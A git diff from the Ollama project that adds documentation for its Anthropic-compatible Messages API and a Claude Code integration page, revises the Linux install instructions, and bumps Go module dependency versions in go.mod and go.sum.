406
docs/api/anthropic-compatibility.mdx
Normal file
406
docs/api/anthropic-compatibility.mdx
Normal file
@@ -0,0 +1,406 @@
|
||||
---
|
||||
title: Anthropic compatibility
|
||||
---
|
||||
|
||||
Ollama provides compatibility with the [Anthropic Messages API](https://docs.anthropic.com/en/api/messages) to help connect existing applications to Ollama, including tools like Claude Code.
|
||||
|
||||
## Recommended models
|
||||
|
||||
For coding use cases, models like `glm-4.7:cloud`, `minimax-m2.1:cloud`, and `qwen3-coder` are recommended.
|
||||
|
||||
Pull a model before use:
|
||||
```shell
|
||||
ollama pull qwen3-coder
|
||||
ollama pull glm-4.7:cloud
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
### Environment variables
|
||||
|
||||
To use Ollama with tools that expect the Anthropic API (like Claude Code), set these environment variables:
|
||||
|
||||
```shell
|
||||
export ANTHROPIC_BASE_URL=http://localhost:11434
|
||||
export ANTHROPIC_API_KEY=ollama # required but ignored
|
||||
```
|
||||
|
||||
### Simple `/v1/messages` example
|
||||
|
||||
<CodeGroup dropdown>
|
||||
|
||||
```python basic.py
|
||||
import anthropic
|
||||
|
||||
client = anthropic.Anthropic(
|
||||
base_url='http://localhost:11434',
|
||||
api_key='ollama', # required but ignored
|
||||
)
|
||||
|
||||
message = client.messages.create(
|
||||
model='qwen3-coder',
|
||||
max_tokens=1024,
|
||||
messages=[
|
||||
{'role': 'user', 'content': 'Hello, how are you?'}
|
||||
]
|
||||
)
|
||||
print(message.content[0].text)
|
||||
```
|
||||
|
||||
```javascript basic.js
|
||||
import Anthropic from "@anthropic-ai/sdk";
|
||||
|
||||
const anthropic = new Anthropic({
|
||||
baseURL: "http://localhost:11434",
|
||||
apiKey: "ollama", // required but ignored
|
||||
});
|
||||
|
||||
const message = await anthropic.messages.create({
|
||||
model: "qwen3-coder",
|
||||
max_tokens: 1024,
|
||||
messages: [{ role: "user", content: "Hello, how are you?" }],
|
||||
});
|
||||
|
||||
console.log(message.content[0].text);
|
||||
```
|
||||
|
||||
```shell basic.sh
|
||||
curl -X POST http://localhost:11434/v1/messages \
|
||||
-H "Content-Type: application/json" \
|
||||
-H "x-api-key: ollama" \
|
||||
-H "anthropic-version: 2023-06-01" \
|
||||
-d '{
|
||||
"model": "qwen3-coder",
|
||||
"max_tokens": 1024,
|
||||
"messages": [{ "role": "user", "content": "Hello, how are you?" }]
|
||||
}'
|
||||
```
|
||||
|
||||
</CodeGroup>
|
||||
|
||||
### Streaming example
|
||||
|
||||
<CodeGroup dropdown>
|
||||
|
||||
```python streaming.py
|
||||
import anthropic
|
||||
|
||||
client = anthropic.Anthropic(
|
||||
base_url='http://localhost:11434',
|
||||
api_key='ollama',
|
||||
)
|
||||
|
||||
with client.messages.stream(
|
||||
model='qwen3-coder',
|
||||
max_tokens=1024,
|
||||
messages=[{'role': 'user', 'content': 'Count from 1 to 10'}]
|
||||
) as stream:
|
||||
for text in stream.text_stream:
|
||||
print(text, end='', flush=True)
|
||||
```
|
||||
|
||||
```javascript streaming.js
|
||||
import Anthropic from "@anthropic-ai/sdk";
|
||||
|
||||
const anthropic = new Anthropic({
|
||||
baseURL: "http://localhost:11434",
|
||||
apiKey: "ollama",
|
||||
});
|
||||
|
||||
const stream = await anthropic.messages.stream({
|
||||
model: "qwen3-coder",
|
||||
max_tokens: 1024,
|
||||
messages: [{ role: "user", content: "Count from 1 to 10" }],
|
||||
});
|
||||
|
||||
for await (const event of stream) {
|
||||
if (
|
||||
event.type === "content_block_delta" &&
|
||||
event.delta.type === "text_delta"
|
||||
) {
|
||||
process.stdout.write(event.delta.text);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
```shell streaming.sh
|
||||
curl -X POST http://localhost:11434/v1/messages \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"model": "qwen3-coder",
|
||||
"max_tokens": 1024,
|
||||
"stream": true,
|
||||
"messages": [{ "role": "user", "content": "Count from 1 to 10" }]
|
||||
}'
|
||||
```
|
||||
|
||||
</CodeGroup>
|
||||
|
||||
### Tool calling example
|
||||
|
||||
<CodeGroup dropdown>
|
||||
|
||||
```python tools.py
|
||||
import anthropic
|
||||
|
||||
client = anthropic.Anthropic(
|
||||
base_url='http://localhost:11434',
|
||||
api_key='ollama',
|
||||
)
|
||||
|
||||
message = client.messages.create(
|
||||
model='qwen3-coder',
|
||||
max_tokens=1024,
|
||||
tools=[
|
||||
{
|
||||
'name': 'get_weather',
|
||||
'description': 'Get the current weather in a location',
|
||||
'input_schema': {
|
||||
'type': 'object',
|
||||
'properties': {
|
||||
'location': {
|
||||
'type': 'string',
|
||||
'description': 'The city and state, e.g. San Francisco, CA'
|
||||
}
|
||||
},
|
||||
'required': ['location']
|
||||
}
|
||||
}
|
||||
],
|
||||
messages=[{'role': 'user', 'content': "What's the weather in San Francisco?"}]
|
||||
)
|
||||
|
||||
for block in message.content:
|
||||
if block.type == 'tool_use':
|
||||
print(f'Tool: {block.name}')
|
||||
print(f'Input: {block.input}')
|
||||
```
|
||||
|
||||
```javascript tools.js
|
||||
import Anthropic from "@anthropic-ai/sdk";
|
||||
|
||||
const anthropic = new Anthropic({
|
||||
baseURL: "http://localhost:11434",
|
||||
apiKey: "ollama",
|
||||
});
|
||||
|
||||
const message = await anthropic.messages.create({
|
||||
model: "qwen3-coder",
|
||||
max_tokens: 1024,
|
||||
tools: [
|
||||
{
|
||||
name: "get_weather",
|
||||
description: "Get the current weather in a location",
|
||||
input_schema: {
|
||||
type: "object",
|
||||
properties: {
|
||||
location: {
|
||||
type: "string",
|
||||
description: "The city and state, e.g. San Francisco, CA",
|
||||
},
|
||||
},
|
||||
required: ["location"],
|
||||
},
|
||||
},
|
||||
],
|
||||
messages: [{ role: "user", content: "What's the weather in San Francisco?" }],
|
||||
});
|
||||
|
||||
for (const block of message.content) {
|
||||
if (block.type === "tool_use") {
|
||||
console.log("Tool:", block.name);
|
||||
console.log("Input:", block.input);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
```shell tools.sh
|
||||
curl -X POST http://localhost:11434/v1/messages \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"model": "qwen3-coder",
|
||||
"max_tokens": 1024,
|
||||
"tools": [
|
||||
{
|
||||
"name": "get_weather",
|
||||
"description": "Get the current weather in a location",
|
||||
"input_schema": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"location": {
|
||||
"type": "string",
|
||||
"description": "The city and state"
|
||||
}
|
||||
},
|
||||
"required": ["location"]
|
||||
}
|
||||
}
|
||||
],
|
||||
"messages": [{ "role": "user", "content": "What is the weather in San Francisco?" }]
|
||||
}'
|
||||
```
|
||||
|
||||
</CodeGroup>
|
||||
|
||||
## Using with Claude Code
|
||||
|
||||
[Claude Code](https://code.claude.com/docs/en/overview) can be configured to use Ollama as its backend:
|
||||
|
||||
```shell
|
||||
ANTHROPIC_BASE_URL=http://localhost:11434 ANTHROPIC_API_KEY=ollama claude --model qwen3-coder
|
||||
```
|
||||
|
||||
Or set the environment variables in your shell profile:
|
||||
|
||||
```shell
|
||||
export ANTHROPIC_BASE_URL=http://localhost:11434
|
||||
export ANTHROPIC_API_KEY=ollama
|
||||
```
|
||||
|
||||
Then run Claude Code with any Ollama model:
|
||||
|
||||
```shell
|
||||
# Local models
|
||||
claude --model qwen3-coder
|
||||
claude --model gpt-oss:20b
|
||||
|
||||
# Cloud models
|
||||
claude --model glm-4.7:cloud
|
||||
claude --model minimax-m2.1:cloud
|
||||
```
|
||||
|
||||
## Endpoints
|
||||
|
||||
### `/v1/messages`
|
||||
|
||||
#### Supported features
|
||||
|
||||
- [x] Messages
|
||||
- [x] Streaming
|
||||
- [x] System prompts
|
||||
- [x] Multi-turn conversations
|
||||
- [x] Vision (images)
|
||||
- [x] Tools (function calling)
|
||||
- [x] Tool results
|
||||
- [x] Thinking/extended thinking
|
||||
|
||||
#### Supported request fields
|
||||
|
||||
- [x] `model`
|
||||
- [x] `max_tokens`
|
||||
- [x] `messages`
|
||||
- [x] Text `content`
|
||||
- [x] Image `content` (base64)
|
||||
- [x] Array of content blocks
|
||||
- [x] `tool_use` blocks
|
||||
- [x] `tool_result` blocks
|
||||
- [x] `thinking` blocks
|
||||
- [x] `system` (string or array)
|
||||
- [x] `stream`
|
||||
- [x] `temperature`
|
||||
- [x] `top_p`
|
||||
- [x] `top_k`
|
||||
- [x] `stop_sequences`
|
||||
- [x] `tools`
|
||||
- [x] `thinking`
|
||||
- [ ] `tool_choice`
|
||||
- [ ] `metadata`
|
||||
|
||||
#### Supported response fields
|
||||
|
||||
- [x] `id`
|
||||
- [x] `type`
|
||||
- [x] `role`
|
||||
- [x] `model`
|
||||
- [x] `content` (text, tool_use, thinking blocks)
|
||||
- [x] `stop_reason` (end_turn, max_tokens, tool_use)
|
||||
- [x] `usage` (input_tokens, output_tokens)
|
||||
|
||||
#### Streaming events
|
||||
|
||||
- [x] `message_start`
|
||||
- [x] `content_block_start`
|
||||
- [x] `content_block_delta` (text_delta, input_json_delta, thinking_delta)
|
||||
- [x] `content_block_stop`
|
||||
- [x] `message_delta`
|
||||
- [x] `message_stop`
|
||||
- [x] `ping`
|
||||
- [x] `error`
|
||||
|
||||
## Models
|
||||
|
||||
Ollama supports both local and cloud models.
|
||||
|
||||
### Local models
|
||||
|
||||
Pull a local model before use:
|
||||
|
||||
```shell
|
||||
ollama pull qwen3-coder
|
||||
```
|
||||
|
||||
Recommended local models:
|
||||
- `qwen3-coder` - Excellent for coding tasks
|
||||
- `gpt-oss:20b` - Strong general-purpose model
|
||||
|
||||
### Cloud models
|
||||
|
||||
Cloud models are available immediately without pulling:
|
||||
|
||||
- `glm-4.7:cloud` - High-performance cloud model
|
||||
- `minimax-m2.1:cloud` - Fast cloud model
|
||||
|
||||
### Default model names
|
||||
|
||||
For tooling that relies on default Anthropic model names such as `claude-3-5-sonnet`, use `ollama cp` to copy an existing model name:
|
||||
|
||||
```shell
|
||||
ollama cp qwen3-coder claude-3-5-sonnet
|
||||
```
|
||||
|
||||
Afterwards, this new model name can be specified in the `model` field:
|
||||
|
||||
```shell
|
||||
curl http://localhost:11434/v1/messages \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"model": "claude-3-5-sonnet",
|
||||
"max_tokens": 1024,
|
||||
"messages": [
|
||||
{
|
||||
"role": "user",
|
||||
"content": "Hello!"
|
||||
}
|
||||
]
|
||||
}'
|
||||
```
|
||||
|
||||
## Differences from the Anthropic API
|
||||
|
||||
### Behavior differences
|
||||
|
||||
- API key is accepted but not validated
|
||||
- `anthropic-version` header is accepted but not used
|
||||
- Token counts are approximations based on the underlying model's tokenizer
|
||||
|
||||
### Not supported
|
||||
|
||||
The following Anthropic API features are not currently supported:
|
||||
|
||||
| Feature | Description |
|
||||
|---------|-------------|
|
||||
| `/v1/messages/count_tokens` | Token counting endpoint |
|
||||
| `tool_choice` | Forcing specific tool use or disabling tools |
|
||||
| `metadata` | Request metadata (user_id) |
|
||||
| Prompt caching | `cache_control` blocks for caching prefixes |
|
||||
| Batches API | `/v1/messages/batches` for async batch processing |
|
||||
| Citations | `citations` content blocks |
|
||||
| PDF support | `document` content blocks with PDF files |
|
||||
| Server-sent errors | `error` events during streaming (errors return HTTP status) |
|
||||
|
||||
### Partial support
|
||||
|
||||
| Feature | Status |
|
||||
|---------|--------|
|
||||
| Image content | Base64 images supported; URL images not supported |
|
||||
| Extended thinking | Basic support; `budget_tokens` accepted but not enforced |
|
||||
@@ -32,7 +32,9 @@
|
||||
"codeblocks": "system"
|
||||
},
|
||||
"contextual": {
|
||||
"options": ["copy"]
|
||||
"options": [
|
||||
"copy"
|
||||
]
|
||||
},
|
||||
"navbar": {
|
||||
"links": [
|
||||
@@ -52,7 +54,9 @@
|
||||
"display": "simple"
|
||||
},
|
||||
"examples": {
|
||||
"languages": ["curl"]
|
||||
"languages": [
|
||||
"curl"
|
||||
]
|
||||
}
|
||||
},
|
||||
"redirects": [
|
||||
@@ -97,6 +101,7 @@
|
||||
{
|
||||
"group": "Integrations",
|
||||
"pages": [
|
||||
"/integrations/claude-code",
|
||||
"/integrations/vscode",
|
||||
"/integrations/jetbrains",
|
||||
"/integrations/codex",
|
||||
@@ -139,7 +144,8 @@
|
||||
"/api/streaming",
|
||||
"/api/usage",
|
||||
"/api/errors",
|
||||
"/api/openai-compatibility"
|
||||
"/api/openai-compatibility",
|
||||
"/api/anthropic-compatibility"
|
||||
]
|
||||
},
|
||||
{
|
||||
|
||||
69
docs/integrations/claude-code.mdx
Normal file
69
docs/integrations/claude-code.mdx
Normal file
@@ -0,0 +1,69 @@
|
||||
---
|
||||
title: Claude Code
|
||||
---
|
||||
|
||||
## Install
|
||||
|
||||
Install [Claude Code](https://code.claude.com/docs/en/overview):
|
||||
|
||||
<CodeGroup>
|
||||
|
||||
```shell macOS / Linux
|
||||
curl -fsSL https://claude.ai/install.sh | bash
|
||||
```
|
||||
|
||||
```powershell Windows
|
||||
irm https://claude.ai/install.ps1 | iex
|
||||
```
|
||||
|
||||
</CodeGroup>
|
||||
|
||||
## Usage with Ollama
|
||||
|
||||
Claude Code connects to Ollama using the Anthropic-compatible API.
|
||||
|
||||
1. Set the environment variables:
|
||||
|
||||
```shell
|
||||
export ANTHROPIC_BASE_URL=http://localhost:11434
|
||||
export ANTHROPIC_API_KEY=ollama
|
||||
```
|
||||
|
||||
2. Run Claude Code with an Ollama model:
|
||||
|
||||
```shell
|
||||
claude --model qwen3-coder
|
||||
```
|
||||
|
||||
Or run with environment variables inline:
|
||||
|
||||
```shell
|
||||
ANTHROPIC_BASE_URL=http://localhost:11434 ANTHROPIC_API_KEY=ollama claude --model qwen3-coder
|
||||
```
|
||||
|
||||
## Connecting to ollama.com
|
||||
|
||||
1. Create an [API key](https://ollama.com/settings/keys) on ollama.com
|
||||
2. Set the environment variables:
|
||||
|
||||
```shell
|
||||
export ANTHROPIC_BASE_URL=https://ollama.com
|
||||
export ANTHROPIC_API_KEY=<your-api-key>
|
||||
```
|
||||
|
||||
3. Run Claude Code with a cloud model:
|
||||
|
||||
```shell
|
||||
claude --model glm-4.7:cloud
|
||||
```
|
||||
|
||||
## Recommended Models
|
||||
|
||||
### Cloud models
|
||||
- `glm-4.7:cloud` - High-performance cloud model
|
||||
- `minimax-m2.1:cloud` - Fast cloud model
|
||||
- `qwen3-coder:480b` - Large coding model
|
||||
|
||||
### Local models
|
||||
- `qwen3-coder` - Excellent for coding tasks
|
||||
- `gpt-oss:20b` - Strong general-purpose model
|
||||
@@ -1,5 +1,5 @@
|
||||
---
|
||||
title: Linux
|
||||
title: "Linux"
|
||||
---
|
||||
|
||||
## Install
|
||||
@@ -13,15 +13,14 @@ curl -fsSL https://ollama.com/install.sh | sh
|
||||
## Manual install
|
||||
|
||||
<Note>
|
||||
If you are upgrading from a prior version, you should remove the old libraries
|
||||
with `sudo rm -rf /usr/lib/ollama` first.
|
||||
If you are upgrading from a prior version, you should remove the old libraries with `sudo rm -rf /usr/lib/ollama` first.
|
||||
</Note>
|
||||
|
||||
Download and extract the package:
|
||||
|
||||
```shell
|
||||
curl -fsSL https://ollama.com/download/ollama-linux-amd64.tar.zst \
|
||||
| sudo tar x -C /usr
|
||||
curl -fsSL https://ollama.com/download/ollama-linux-amd64.tgz \
|
||||
| sudo tar zx -C /usr
|
||||
```
|
||||
|
||||
Start Ollama:
|
||||
@@ -41,8 +40,8 @@ ollama -v
|
||||
If you have an AMD GPU, also download and extract the additional ROCm package:
|
||||
|
||||
```shell
|
||||
curl -fsSL https://ollama.com/download/ollama-linux-amd64-rocm.tar.zst \
|
||||
| sudo tar x -C /usr
|
||||
curl -fsSL https://ollama.com/download/ollama-linux-amd64-rocm.tgz \
|
||||
| sudo tar zx -C /usr
|
||||
```
|
||||
|
||||
### ARM64 install
|
||||
@@ -50,8 +49,8 @@ curl -fsSL https://ollama.com/download/ollama-linux-amd64-rocm.tar.zst \
|
||||
Download and extract the ARM64-specific package:
|
||||
|
||||
```shell
|
||||
curl -fsSL https://ollama.com/download/ollama-linux-arm64.tar.zst \
|
||||
| sudo tar x -C /usr
|
||||
curl -fsSL https://ollama.com/download/ollama-linux-arm64.tgz \
|
||||
| sudo tar zx -C /usr
|
||||
```
|
||||
|
||||
### Adding Ollama as a startup service (recommended)
|
||||
@@ -113,11 +112,7 @@ sudo systemctl status ollama
|
||||
```
|
||||
|
||||
<Note>
|
||||
While AMD has contributed the `amdgpu` driver upstream to the official linux
|
||||
kernel source, the version is older and may not support all ROCm features. We
|
||||
recommend you install the latest driver from
|
||||
https://www.amd.com/en/support/linux-drivers for best support of your Radeon
|
||||
GPU.
|
||||
While AMD has contributed the `amdgpu` driver upstream to the official linux kernel source, the version is older and may not support all ROCm features. We recommend you install the latest driver from https://www.amd.com/en/support/linux-drivers for best support of your Radeon GPU.
|
||||
</Note>
|
||||
|
||||
## Customizing
|
||||
@@ -146,8 +141,8 @@ curl -fsSL https://ollama.com/install.sh | sh
|
||||
Or by re-downloading Ollama:
|
||||
|
||||
```shell
|
||||
curl -fsSL https://ollama.com/download/ollama-linux-amd64.tar.zst \
|
||||
| sudo tar x -C /usr
|
||||
curl -fsSL https://ollama.com/download/ollama-linux-amd64.tgz \
|
||||
| sudo tar zx -C /usr
|
||||
```
|
||||
|
||||
## Installing specific versions
|
||||
@@ -196,4 +191,4 @@ Remove the downloaded models and Ollama service user and group:
|
||||
sudo userdel ollama
|
||||
sudo groupdel ollama
|
||||
sudo rm -r /usr/share/ollama
|
||||
```
|
||||
```
|
||||
18
go.mod
18
go.mod
@@ -15,8 +15,8 @@ require (
|
||||
github.com/spf13/cobra v1.7.0
|
||||
github.com/stretchr/testify v1.9.0
|
||||
github.com/x448/float16 v0.8.4
|
||||
golang.org/x/sync v0.17.0
|
||||
golang.org/x/sys v0.37.0
|
||||
golang.org/x/sync v0.19.0
|
||||
golang.org/x/sys v0.39.0
|
||||
)
|
||||
|
||||
require (
|
||||
@@ -30,8 +30,8 @@ require (
|
||||
github.com/tkrajina/typescriptify-golang-structs v0.2.0
|
||||
github.com/wk8/go-ordered-map/v2 v2.1.8
|
||||
golang.org/x/image v0.22.0
|
||||
golang.org/x/mod v0.30.0
|
||||
golang.org/x/tools v0.38.0
|
||||
golang.org/x/mod v0.31.0
|
||||
golang.org/x/tools v0.40.0
|
||||
gonum.org/v1/gonum v0.15.0
|
||||
)
|
||||
|
||||
@@ -81,11 +81,11 @@ require (
|
||||
github.com/twitchyliquid64/golang-asm v0.15.1 // indirect
|
||||
github.com/ugorji/go/codec v1.2.12 // indirect
|
||||
golang.org/x/arch v0.8.0 // indirect
|
||||
golang.org/x/crypto v0.43.0
|
||||
golang.org/x/exp v0.0.0-20250218142911-aa4b98e5adaa // indirect
|
||||
golang.org/x/net v0.46.0 // indirect
|
||||
golang.org/x/term v0.36.0
|
||||
golang.org/x/text v0.30.0
|
||||
golang.org/x/crypto v0.46.0
|
||||
golang.org/x/exp v0.0.0-20251219203646-944ab1f22d93
|
||||
golang.org/x/net v0.48.0 // indirect
|
||||
golang.org/x/term v0.38.0
|
||||
golang.org/x/text v0.32.0
|
||||
google.golang.org/protobuf v1.34.1
|
||||
gopkg.in/yaml.v3 v3.0.1 // indirect
|
||||
)
|
||||
|
||||
36
go.sum
36
go.sum
@@ -233,16 +233,16 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
|
||||
golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.43.0 h1:dduJYIi3A3KOfdGOHX8AVZ/jGiyPa3IbBozJ5kNuE04=
|
||||
golang.org/x/crypto v0.43.0/go.mod h1:BFbav4mRNlXJL4wNeejLpWxB7wMbc79PdRGhWKncxR0=
|
||||
golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU=
|
||||
golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0=
|
||||
golang.org/x/exp v0.0.0-20180321215751-8460e604b9de/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20180807140117-3d87b88a115f/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20190125153040-c74c464bbbf2/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20191002040644-a1355ae1e2c3/go.mod h1:NOZ3BPKG0ec/BKJQgnvsSFpcKLM5xXVWnvZS97DWHgE=
|
||||
golang.org/x/exp v0.0.0-20250218142911-aa4b98e5adaa h1:t2QcU6V556bFjYgu4L6C+6VrCPyJZ+eyRsABUPs1mz4=
|
||||
golang.org/x/exp v0.0.0-20250218142911-aa4b98e5adaa/go.mod h1:BHOTPb3L19zxehTsLoJXVaTktb06DFgmdW6Wb9s8jqk=
|
||||
golang.org/x/exp v0.0.0-20251219203646-944ab1f22d93 h1:fQsdNF2N+/YewlRZiricy4P1iimyPKZ/xwniHj8Q2a0=
|
||||
golang.org/x/exp v0.0.0-20251219203646-944ab1f22d93/go.mod h1:EPRbTFwzwjXj9NpYyyrvenVh9Y+GFeEvMNh7Xuz7xgU=
|
||||
golang.org/x/image v0.0.0-20180708004352-c73c2afc3b81/go.mod h1:ux5Hcp/YLpHSI86hEcLt0YII63i6oz57MZXIpbrjZUs=
|
||||
golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js=
|
||||
golang.org/x/image v0.0.0-20190802002840-cff245a6509b/go.mod h1:FeLwcggjj3mMvU+oOTbSwawSJRM1uh48EjtB4UJZlP0=
|
||||
@@ -264,8 +264,8 @@ golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzB
|
||||
golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.30.0 h1:fDEXFVZ/fmCKProc/yAXXUijritrDzahmwwefnjoPFk=
|
||||
golang.org/x/mod v0.30.0/go.mod h1:lAsf5O2EvJeSFMiBxXDki7sCgAxEUcZHXoXMKT4GJKc=
|
||||
golang.org/x/mod v0.31.0 h1:HaW9xtz0+kOcWKwli0ZXy79Ix+UW/vOfmWI5QVd2tgI=
|
||||
golang.org/x/mod v0.31.0/go.mod h1:43JraMp9cGx1Rx3AqioxrbrhNsLl2l/iNAvuBkrezpg=
|
||||
golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
@@ -278,8 +278,8 @@ golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81R
|
||||
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
|
||||
golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM=
|
||||
golang.org/x/net v0.0.0-20210614182718-04defd469f4e/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
|
||||
golang.org/x/net v0.46.0 h1:giFlY12I07fugqwPuWJi68oOnpfqFnJIJzaIIm2JVV4=
|
||||
golang.org/x/net v0.46.0/go.mod h1:Q9BGdFy1y4nkUwiLvT5qtyhAnEHgnQ/zd8PfU6nc210=
|
||||
golang.org/x/net v0.48.0 h1:zyQRTTrjc33Lhh0fBgT/H3oZq9WuvRR5gPC70xpDiQU=
|
||||
golang.org/x/net v0.48.0/go.mod h1:+ndRgGjkh8FGtu1w1FGbEC31if4VrNVMuKTgcAAnQRY=
|
||||
golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
|
||||
golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
@@ -289,8 +289,8 @@ golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJ
|
||||
golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.17.0 h1:l60nONMj9l5drqw6jlhIELNv9I0A4OFgRsG9k2oT9Ug=
|
||||
golang.org/x/sync v0.17.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
|
||||
golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4=
|
||||
golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
|
||||
golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
@@ -306,17 +306,17 @@ golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBc
|
||||
golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.37.0 h1:fdNQudmxPjkdUTPnLn5mdQv7Zwvbvpaxqs831goi9kQ=
|
||||
golang.org/x/sys v0.37.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
|
||||
golang.org/x/sys v0.39.0 h1:CvCKL8MeisomCi6qNZ+wbb0DN9E5AATixKsvNtMoMFk=
|
||||
golang.org/x/sys v0.39.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
|
||||
golang.org/x/term v0.36.0 h1:zMPR+aF8gfksFprF/Nc/rd1wRS1EI6nDBGyWAvDzx2Q=
|
||||
golang.org/x/term v0.36.0/go.mod h1:Qu394IJq6V6dCBRgwqshf3mPF85AqzYEzofzRdZkWss=
|
||||
golang.org/x/term v0.38.0 h1:PQ5pkm/rLO6HnxFR7N2lJHOZX6Kez5Y1gDSJla6jo7Q=
|
||||
golang.org/x/term v0.38.0/go.mod h1:bSEAKrOT1W+VSu9TSCMtoGEOUcKxOKgl3LE5QEF/xVg=
|
||||
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
